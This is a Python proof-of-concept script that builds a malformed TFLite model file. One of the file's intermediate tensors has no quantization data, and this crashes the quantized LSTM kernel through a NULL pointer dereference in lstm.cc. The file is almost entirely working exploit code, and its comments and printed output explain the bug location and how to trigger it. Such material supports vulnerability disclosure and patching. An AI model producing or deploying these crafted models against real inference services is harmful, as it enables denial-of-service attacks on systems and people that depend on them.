File size: 19,029 Bytes
befad9a
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
#!/usr/bin/env python3
"""
PoC: TFLite LSTM NULL pointer dereference -> DoS (SIGSEGV)

Bug: PopulateQuantizedLstmParams8x8_8() in lstm.cc (line ~674) reads
intermediate tensors' quantization.params without null check:

    auto* params = reinterpret_cast<TfLiteAffineQuantization*>(
        intermediate->quantization.params);
    intermediate_scale.push_back(params->scale->data[0]);  // NULL deref!

When an intermediate tensor has no QuantizationParameters in the flatbuffer,
quantization.params is NULL -> SIGSEGV at params->scale dereference.

Contrast with the sibling function PopulateQuantizedLstmParams8x8_16()
which uses GetIntermediatesSafe() - the 8x8_8 path skips this safe accessor.

Trigger: int8 quantized LSTM with 12 intermediate tensors (8x8->8 path),
where at least one intermediate lacks quantization metadata.

Builds .tflite flatbuffer directly (only needs `pip install flatbuffers`).
"""
import sys
import os
import struct

# TFLite schema constants
TFLITE_SCHEMA_VERSION = 3

# TensorType enum
TENSOR_TYPE_INT8 = 9
TENSOR_TYPE_INT16 = 7
TENSOR_TYPE_INT32 = 2

# BuiltinOperator enum
BUILTIN_OP_LSTM = 16

# BuiltinOptions union index for LSTMOptions
BUILTIN_OPTIONS_LSTM = 14

# ActivationFunctionType
ACTIVATION_NONE = 0

# LSTMKernelType
LSTM_KERNEL_FULL = 0

# LSTM input tensor indices (24-input full kernel)
LSTM_INPUT_NAMES = [
    "input",                          # 0
    "input_to_input_weights",         # 1  (optional, CIFG)
    "input_to_forget_weights",        # 2
    "input_to_cell_weights",          # 3
    "input_to_output_weights",        # 4
    "recurrent_to_input_weights",     # 5  (optional, CIFG)
    "recurrent_to_forget_weights",    # 6
    "recurrent_to_cell_weights",      # 7
    "recurrent_to_output_weights",    # 8
    "cell_to_input_weights",          # 9  (optional)
    "cell_to_forget_weights",         # 10 (optional)
    "cell_to_output_weights",         # 11 (optional)
    "input_gate_bias",                # 12 (optional, CIFG)
    "forget_gate_bias",               # 13
    "cell_gate_bias",                 # 14
    "output_gate_bias",               # 15
    "projection_weights",             # 16 (optional)
    "projection_bias",                # 17 (optional)
    "output_state",                   # 18 (variable)
    "cell_state",                     # 19 (variable)
    "input_layer_norm_coefficients",  # 20 (optional)
    "forget_layer_norm_coefficients", # 21 (optional)
    "cell_layer_norm_coefficients",   # 22 (optional)
    "output_layer_norm_coefficients", # 23 (optional)
]


def create_poc_model(output_path, n_batch=1, n_input=2, n_cell=2, n_output=2):
    """Build minimal .tflite with int8 LSTM op that triggers NULL deref.

    The model has 12 intermediate tensors (8x8->8 path), but intermediate[0]
    has NO quantization parameters -> NULL pointer dereference in Prepare().
    """
    import flatbuffers

    b = flatbuffers.Builder(8192)

    # =========================================================================
    # Pre-build strings (must be created before any table starts)
    # =========================================================================
    s_main = b.CreateString("main")
    tensor_names = {}
    # Regular tensors
    for name in ["input", "i2f_w", "i2c_w", "i2o_w",
                 "r2f_w", "r2c_w", "r2o_w",
                 "fg_bias", "cg_bias", "og_bias",
                 "output_state", "cell_state", "output"]:
        tensor_names[name] = b.CreateString(name)
    # Intermediate tensors
    for i in range(12):
        tensor_names[f"inter_{i}"] = b.CreateString(f"intermediate_{i}")

    # =========================================================================
    # Helper: create int vector
    # =========================================================================
    def make_int_vec(vals):
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals):
            b.PrependInt32(v)
        return b.EndVector()

    # =========================================================================
    # Helper: create float vector
    # =========================================================================
    def make_float_vec(vals):
        b.StartVector(4, len(vals), 4)
        for v in reversed(vals):
            b.PrependFloat32(v)
        return b.EndVector()

    # =========================================================================
    # Helper: create int64 vector (for zero_point in quantization)
    # =========================================================================
    def make_int64_vec(vals):
        b.StartVector(8, len(vals), 8)
        for v in reversed(vals):
            b.PrependInt64(v)
        return b.EndVector()

    # =========================================================================
    # Helper: create bool vector
    # =========================================================================
    def make_bool_vec(vals):
        b.StartVector(1, len(vals), 1)
        for v in reversed(vals):
            b.PrependBool(v)
        return b.EndVector()

    # =========================================================================
    # Helper: create QuantizationParameters table
    # =========================================================================
    def make_quant(scale_val, zp_val=0):
        """Build a QuantizationParameters table with given scale and zero_point."""
        scale_vec = make_float_vec([scale_val])
        zp_vec = make_int64_vec([zp_val])
        # QuantizationParameters: 7 slots (0=min,1=max,2=scale,3=zero_point,
        #   4=details_type,5=details,6=quantized_dimension)
        b.StartObject(7)
        b.PrependUOffsetTRelativeSlot(2, scale_vec, 0)   # scale
        b.PrependUOffsetTRelativeSlot(3, zp_vec, 0)      # zero_point
        return b.EndObject()

    # =========================================================================
    # Helper: create Tensor table
    # =========================================================================
    def make_tensor(name_off, shape_off, tensor_type, buf_idx,
                    quant_off=0, is_variable=False):
        """Build a Tensor table.

        Tensor has 10+ fields:
          0=shape, 1=type, 2=buffer, 3=name, 4=quantization,
          5=is_variable, 6=sparsity, 7=shape_signature, 8=has_rank,
          9=variant_tensors
        """
        b.StartObject(10)
        b.PrependUOffsetTRelativeSlot(0, shape_off, 0)   # shape
        b.PrependByteSlot(1, tensor_type, 0)             # type
        b.PrependUint32Slot(2, buf_idx, 0)               # buffer
        b.PrependUOffsetTRelativeSlot(3, name_off, 0)    # name
        if quant_off:
            b.PrependUOffsetTRelativeSlot(4, quant_off, 0)  # quantization
        if is_variable:
            b.PrependBoolSlot(5, True, False)             # is_variable
        return b.EndObject()

    # =========================================================================
    # Shape vectors
    # =========================================================================
    shape_input = make_int_vec([n_batch, n_input])        # [1, 2]
    shape_weight_i = make_int_vec([n_cell, n_input])      # [2, 2]
    shape_weight_r = make_int_vec([n_cell, n_output])     # [2, 2]
    shape_bias = make_int_vec([n_cell])                   # [2]
    shape_ostate = make_int_vec([n_batch, n_output])      # [1, 2]
    shape_cstate = make_int_vec([n_batch, n_cell])        # [1, 2]
    shape_output = make_int_vec([n_batch, n_output])      # [1, 2]
    shape_inter = make_int_vec([1])                       # [1] minimal

    # =========================================================================
    # Quantization parameters
    # =========================================================================
    q_input = make_quant(0.1)           # input scale
    q_weight = make_quant(0.01)         # weight scale
    q_ostate = make_quant(0.1)          # output_state scale
    q_cstate = make_quant(1.0 / 32768)  # cell_state: must be 1/32768 for 8x8_8
    q_output = make_quant(0.1)          # output scale
    q_inter = make_quant(0.01)          # intermediate scale (for valid ones)

    # =========================================================================
    # Build tensors (25 total)
    # =========================================================================
    # Buffer index mapping:
    #   0 = sentinel (always empty)
    #   1 = input (empty, runtime alloc)
    #   2-7 = weight data (need actual bytes)
    #   8-10 = bias data (need actual bytes)
    #   11 = output_state (empty, variable)
    #   12 = cell_state (empty, variable)
    #   13 = output (empty, runtime alloc)
    #   14-25 = intermediates (empty)

    tensors = []

    # Tensor 0: input [1,2] INT8 quantized
    tensors.append(make_tensor(tensor_names["input"], shape_input,
                               TENSOR_TYPE_INT8, 1, q_input))

    # Tensors 1-3: input-to-{forget,cell,output} weights [2,2] INT8
    for name in ["i2f_w", "i2c_w", "i2o_w"]:
        tensors.append(make_tensor(tensor_names[name], shape_weight_i,
                                   TENSOR_TYPE_INT8, len(tensors) + 1, q_weight))

    # Tensors 4-6: recurrent-to-{forget,cell,output} weights [2,2] INT8
    for name in ["r2f_w", "r2c_w", "r2o_w"]:
        tensors.append(make_tensor(tensor_names[name], shape_weight_r,
                                   TENSOR_TYPE_INT8, len(tensors) + 1, q_weight))

    # Tensors 7-9: {forget,cell,output}_gate_bias [2] INT32 (no quant needed)
    for name in ["fg_bias", "cg_bias", "og_bias"]:
        tensors.append(make_tensor(tensor_names[name], shape_bias,
                                   TENSOR_TYPE_INT32, len(tensors) + 1))

    # Tensor 10: output_state [1,2] INT8 quantized, VARIABLE
    tensors.append(make_tensor(tensor_names["output_state"], shape_ostate,
                               TENSOR_TYPE_INT8, 11, q_ostate, is_variable=True))

    # Tensor 11: cell_state [1,2] INT16 quantized (scale=1/32768), VARIABLE
    tensors.append(make_tensor(tensor_names["cell_state"], shape_cstate,
                               TENSOR_TYPE_INT16, 12, q_cstate, is_variable=True))

    # Tensor 12: output [1,2] INT8 quantized
    tensors.append(make_tensor(tensor_names["output"], shape_output,
                               TENSOR_TYPE_INT8, 13, q_output))

    # Tensors 13-24: intermediates (12 total)
    # Key: intermediate[0] (tensor 13) has NO quantization -> triggers NULL deref
    for i in range(12):
        if i == 0:
            # NO QUANTIZATION -> this causes the crash
            tensors.append(make_tensor(tensor_names[f"inter_{i}"], shape_inter,
                                       TENSOR_TYPE_INT16, 14 + i))
        else:
            # Valid quantization
            tensors.append(make_tensor(tensor_names[f"inter_{i}"], shape_inter,
                                       TENSOR_TYPE_INT16, 14 + i, q_inter))

    # Tensors vector (must be in order: 0..24)
    b.StartVector(4, len(tensors), 4)
    for t in reversed(tensors):
        b.PrependUOffsetTRelative(t)
    tensors_vec = b.EndVector()

    # =========================================================================
    # LSTMOptions table
    # =========================================================================
    b.StartObject(5)  # LSTMOptions: 5 fields
    b.PrependByteSlot(0, ACTIVATION_NONE, 0)     # fused_activation_function
    b.PrependFloat32Slot(1, 0.0, 0.0)            # cell_clip
    b.PrependFloat32Slot(2, 0.0, 0.0)            # proj_clip
    b.PrependByteSlot(3, LSTM_KERNEL_FULL, 0)    # kernel_type = FULL
    b.PrependBoolSlot(4, False, False)            # asymmetric_quantize_inputs
    lstm_options = b.EndObject()

    # =========================================================================
    # Operator
    # =========================================================================
    # LSTM inputs: 24 entries. -1 = optional/absent.
    # Tensor indices: 0=input, 1=i2f_w, 2=i2c_w, 3=i2o_w, 4=r2f_w, 5=r2c_w,
    #   6=r2o_w, 7=fg_bias, 8=cg_bias, 9=og_bias, 10=output_state, 11=cell_state
    op_input_indices = [
        0,   # 0: input
        -1,  # 1: InputToInputWeights (CIFG mode, absent)
        1,   # 2: InputToForgetWeights
        2,   # 3: InputToCellWeights
        3,   # 4: InputToOutputWeights
        -1,  # 5: RecurrentToInputWeights (CIFG, absent)
        4,   # 6: RecurrentToForgetWeights
        5,   # 7: RecurrentToCellWeights
        6,   # 8: RecurrentToOutputWeights
        -1,  # 9: CellToInputWeights (absent)
        -1,  # 10: CellToForgetWeights (absent)
        -1,  # 11: CellToOutputWeights (absent)
        -1,  # 12: InputGateBias (CIFG, absent)
        7,   # 13: ForgetGateBias
        8,   # 14: CellGateBias
        9,   # 15: OutputGateBias
        -1,  # 16: ProjectionWeights (absent)
        -1,  # 17: ProjectionBias (absent)
        10,  # 18: OutputState (variable)
        11,  # 19: CellState (variable)
        -1,  # 20: InputLayerNormCoefficients (absent)
        -1,  # 21: ForgetLayerNormCoefficients (absent)
        -1,  # 22: CellLayerNormCoefficients (absent)
        -1,  # 23: OutputLayerNormCoefficients (absent)
    ]
    op_inputs_vec = make_int_vec(op_input_indices)
    op_outputs_vec = make_int_vec([12])  # output tensor

    # Intermediate tensor indices (tensors 13-24)
    op_intermediates_vec = make_int_vec(list(range(13, 25)))

    # mutating_variable_inputs: mark inputs 18 (output_state) and 19 (cell_state)
    mutating = [False] * 24
    mutating[18] = True
    mutating[19] = True
    op_mutating_vec = make_bool_vec(mutating)

    # Operator table: 14 slots (including union type/value split)
    # Slot 0: opcode_index, 1: inputs, 2: outputs,
    # 3: builtin_options_type, 4: builtin_options,
    # 5: custom_options, 6: custom_options_format,
    # 7: mutating_variable_inputs, 8: intermediates, ...
    b.StartObject(14)
    b.PrependUint32Slot(0, 0, 0)                              # opcode_index = 0
    b.PrependUOffsetTRelativeSlot(1, op_inputs_vec, 0)        # inputs
    b.PrependUOffsetTRelativeSlot(2, op_outputs_vec, 0)       # outputs
    b.PrependByteSlot(3, BUILTIN_OPTIONS_LSTM, 0)             # builtin_options_type
    b.PrependUOffsetTRelativeSlot(4, lstm_options, 0)         # builtin_options
    b.PrependUOffsetTRelativeSlot(7, op_mutating_vec, 0)      # mutating_variable_inputs
    b.PrependUOffsetTRelativeSlot(8, op_intermediates_vec, 0) # intermediates
    operator = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(operator)
    operators_vec = b.EndVector()

    # =========================================================================
    # SubGraph
    # =========================================================================
    sg_inputs = make_int_vec([0])    # model input: tensor 0
    sg_outputs = make_int_vec([12])  # model output: tensor 12

    b.StartObject(5)  # SubGraph: 5 fields
    b.PrependUOffsetTRelativeSlot(0, tensors_vec, 0)     # tensors
    b.PrependUOffsetTRelativeSlot(1, sg_inputs, 0)       # inputs
    b.PrependUOffsetTRelativeSlot(2, sg_outputs, 0)      # outputs
    b.PrependUOffsetTRelativeSlot(3, operators_vec, 0)   # operators
    b.PrependUOffsetTRelativeSlot(4, s_main, 0)          # name
    subgraph = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(subgraph)
    subgraphs_vec = b.EndVector()

    # =========================================================================
    # OperatorCode
    # =========================================================================
    b.StartObject(4)  # OperatorCode: 4 fields
    b.PrependByteSlot(0, BUILTIN_OP_LSTM, 0)     # deprecated_builtin_code
    b.PrependInt32Slot(2, 1, 1)                   # version
    b.PrependInt32Slot(3, BUILTIN_OP_LSTM, 0)     # builtin_code
    op_code = b.EndObject()

    b.StartVector(4, 1, 4)
    b.PrependUOffsetTRelative(op_code)
    opcodes_vec = b.EndVector()

    # =========================================================================
    # Buffers
    # =========================================================================
    # Total: 26 buffers (0=sentinel, 1=input, 2-7=weights, 8-10=biases,
    #   11=output_state, 12=cell_state, 13=output, 14-25=intermediates)
    #
    # Weights (INT8 [n_cell, n_input] = [2,2] = 4 bytes each): buffers 2-7
    # Biases (INT32 [n_cell] = [2] = 8 bytes each): buffers 8-10
    # All others: empty (runtime allocated)

    weight_data = bytes(n_cell * n_input)  # 4 zero bytes for INT8 [2,2]
    bias_data = bytes(n_cell * 4)          # 8 zero bytes for INT32 [2]

    # Pre-build data vectors for non-empty buffers
    data_vecs = {}
    for buf_idx in range(2, 8):  # weight buffers
        b.StartVector(1, len(weight_data), 1)
        for byte in reversed(weight_data):
            b.PrependByte(byte)
        data_vecs[buf_idx] = b.EndVector()

    for buf_idx in range(8, 11):  # bias buffers
        b.StartVector(1, len(bias_data), 1)
        for byte in reversed(bias_data):
            b.PrependByte(byte)
        data_vecs[buf_idx] = b.EndVector()

    # Build buffer tables
    bufs = []
    for buf_idx in range(26):
        if buf_idx in data_vecs:
            b.StartObject(1)
            b.PrependUOffsetTRelativeSlot(0, data_vecs[buf_idx], 0)
            bufs.append(b.EndObject())
        else:
            b.StartObject(1)
            bufs.append(b.EndObject())

    b.StartVector(4, 26, 4)
    for buf in reversed(bufs):
        b.PrependUOffsetTRelative(buf)
    buffers_vec = b.EndVector()

    # =========================================================================
    # Model (root table)
    # =========================================================================
    b.StartObject(8)  # Model: 8 fields
    b.PrependUint32Slot(0, TFLITE_SCHEMA_VERSION, 0)      # version
    b.PrependUOffsetTRelativeSlot(1, opcodes_vec, 0)       # operator_codes
    b.PrependUOffsetTRelativeSlot(2, subgraphs_vec, 0)     # subgraphs
    b.PrependUOffsetTRelativeSlot(4, buffers_vec, 0)       # buffers
    model = b.EndObject()

    b.Finish(model, b"TFL3")
    buf = bytes(b.Output())

    with open(output_path, 'wb') as f:
        f.write(buf)

    print(f"[+] Model written: {output_path} ({len(buf)} bytes)")
    print(f"[+] LSTM config: n_batch={n_batch}, n_input={n_input}, "
          f"n_cell={n_cell}, n_output={n_output}")
    print(f"[+] 12 intermediate tensors (8x8->8 quantized LSTM path)")
    print(f"[+] intermediate[0] has NO quantization params -> NULL deref")
    print(f"[+] Bug location: lstm.cc PopulateQuantizedLstmParams8x8_8()")
    print(f"[+]   auto* params = reinterpret_cast<TfLiteAffineQuantization*>(")
    print(f"[+]       intermediate->quantization.params);  // NULL!")
    print(f"[+]   params->scale->data[0];  // SIGSEGV")


if __name__ == "__main__":
    out = os.path.join(os.path.dirname(os.path.abspath(__file__)),
                       "poc_lstm_null_deref.tflite")
    create_poc_model(out)